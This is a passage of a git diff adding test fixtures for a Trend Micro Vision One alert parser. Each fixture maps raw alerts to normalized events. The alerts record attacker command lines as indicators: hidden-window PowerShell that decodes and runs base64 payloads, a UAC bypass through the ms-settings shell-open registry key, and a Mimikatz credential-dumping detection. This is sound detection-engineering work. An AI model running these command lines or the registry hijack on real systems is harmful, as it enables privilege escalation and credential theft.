[\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Credential Dumping via Mimikatz", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json new file mode 100644 index 000000000..83d7e99b5 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -0,0 +1,76 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"cloudIdentity\", \"entityValue\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"entityId\": \"arn:aws:sts::985266316733:assumed-role/aad-admin/steven_hung\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user bypassed User Account Control (UAC) to gain higher-level permissions.\", \"matchedRules\": [{\"id\": \"25d96e5d-cb69-4935-ae27-43cc0cdca1cc\", \"name\": \"(T1088) Bypass UAC via shell open registry\", \"matchedFilters\": [{\"id\": \"ac200e74-8309-463e-ad6b-a4c16a3a377f\", \"name\": \"Bypass UAC Via Shell Open Default Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"a32599b7-c0c9-45ed-97bf-f2be7679fb00\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}, {\"id\": \"857b6396-da29-44a8-bc11-25298e646795\", \"name\": \"Bypass UAC Via Shell Open Registry\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"mitreTechniqueIds\": [\"T1112\", \"T1088\", \"V9.T1112\", \"V9.T1548.002\"], \"matchedEvents\": [{\"uuid\": \"4c456bbb-2dfc-40a5-b298-799a0ccefc01\", \"matchedDateTime\": \"2022-09-05T03:53:49.802Z\", \"type\": \"TELEMETRY_REGISTRY\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\rundll32.exe c:\\\\users\\\\sam\\\\appdata\\\\local\\\\cyzfc.dat entrypoint\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....jY0KTtpZXggJHNjQjs=')); iex $r; \", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"registry_key\", \"field\": \"objectRegistryKeyHandle\", \"value\": \"hkcr\\\\ms-settings\\\\shell\\\\open\\\\command\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"registry_value\", \"field\": \"objectRegistryValue\", \"value\": \"delegateexecute\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"857b6396-da29-44a8-bc11-25298e646795\"], \"provenance\": [\"Alert\"]}, {\"id\": 8, \"type\": \"registry_value_data\", \"field\": \"objectRegistryData\", \"value\": \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\\\Microsoft\\\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"ac200e74-8309-463e-ad6b-a4c16a3a377f\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Privilege Escalation via UAC Bypass", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:31Z", + "container": { + "id": "7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496", + "name": "k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "c:\\windows\\system32\\rundll32.exe c:\\users\\sam\\appdata\\local\\cyzfc.dat entrypoint", + "parent": { + "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -noni -win hidden -Ep ByPass $r = [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('....XggJHNjQjs=')); iex $r; " + } + }, + "registry": { + "data": { + "strings": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update); powershell -NoP -NonI -W Hidden -enc $x", + "type": "REG_SZ" + }, + "hive": "hkcr", + "key": "ms-settings\\shell\\open\\command", + "path": "hkcr\\ms-settings\\shell\\open\\command\\hkcr\\ms-settings\\shell\\open\\command\\delegateexecute", + "value": "delegateexecute" + }, + "related": { + "ip": [ + "10.10.58.51" + ], + "user": [ + "sam" + ] + }, + "rule": { + "name": "Privilege Escalation via UAC Bypass" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00022", + "case_id": "CL-1-20230706-00001", + "incident_id": "IC-1-20230706-00001", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + }, + "user": { + "domain": "shockwave", + "email": "support@pctutordetroit.com", + "id": "shockwave\\sam", + "name": "sam" + } + } +} \ No newline at end of file